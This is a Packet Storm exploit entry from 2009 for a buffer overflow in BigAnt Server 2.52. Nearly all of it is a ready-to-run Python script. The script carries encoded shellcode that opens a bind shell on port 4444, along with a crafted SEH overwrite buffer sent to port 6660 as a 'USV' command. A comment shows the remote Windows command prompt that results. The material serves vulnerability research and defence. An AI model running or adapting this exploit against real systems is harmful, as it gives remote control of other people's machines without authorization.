BigAnt Server 2.52 Overflow

2009-12-30T00:00:00
ID PACKETSTORM:84445
Type packetstorm
Reporter Lincoln
Modified 2009-12-30T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
import socket, sys  
  
#########################  
#BigAnt version 2.52 0day  
#Tested on XPSP2 & Win2k3 SP2  
#Discovered by Lincoln  
#Thanks to muts & remote-exploit  
#  
#650 or so bytes available after seh, easier to jump back  
#  
#root@BT4VM:~# ./bigant.py 192.168.87.130  
#Exploit sent! Connect to remote host on port 4444  
#  
#root@BT4VM:~# nc -vn 192.168.87.130 4444  
#(UNKNOWN) [192.168.87.130] 4444 (?) open  
#Microsoft Windows XP [Version 5.1.2600]  
#(C) Copyright 1985-2001 Microsoft Corp.  
#  
#C:\WINDOWS\system32>  
#########################  
  
  
#[*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes  
sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"  
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"  
"\x4e\x46\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x43\x4b\x38\x4e\x37"  
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x48"  
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x53\x4b\x38"  
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"  
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"  
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x4a\x42\x45\x37\x45\x4e\x4b\x58"  
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x54"  
"\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x52\x4b\x38"  
"\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"  
"\x46\x56\x4b\x38\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x48"  
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x36"  
"\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"  
"\x43\x55\x48\x46\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x37\x43\x47"  
"\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"  
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"  
"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30"  
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"  
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x55\x43\x55\x43\x34"  
"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x41"  
"\x4e\x45\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x59\x4a\x46\x46\x4a"  
"\x4c\x41\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"  
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"  
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d"  
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"  
"\x42\x35\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"  
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x35"  
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x36\x48\x36\x4a\x36\x43\x56"  
"\x4d\x56\x49\x58\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x52\x4e\x4c"  
"\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c"  
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x32"  
"\x43\x49\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"  
"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"  
"\x48\x4d\x4b\x55\x47\x45\x44\x45\x41\x45\x41\x35\x41\x55\x4c\x36"  
"\x41\x30\x41\x45\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x46"  
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"  
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"  
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"  
"\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"  
"\x4f\x4f\x42\x4d\x5a")  
  
host = sys.argv[1]  
  
# p/p/r from vbajet32.dll  
buffer = "\x90" * 218 + sc + "\x90" * 35 + "\xeb\x06\x90\x90" + "\x95\x32\x9a\x0f"  
buffer += "\x90" * 10 + "\xe9\x7c\xfc\xff\xff" + "\x90" * 650  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, 6660)) #hardcoded default port  
s.send("USV " + buffer + "\r\n\r\n")  
print "Exploit sent! Connect to remote host on port 4444\n"  
s.close()  
  
`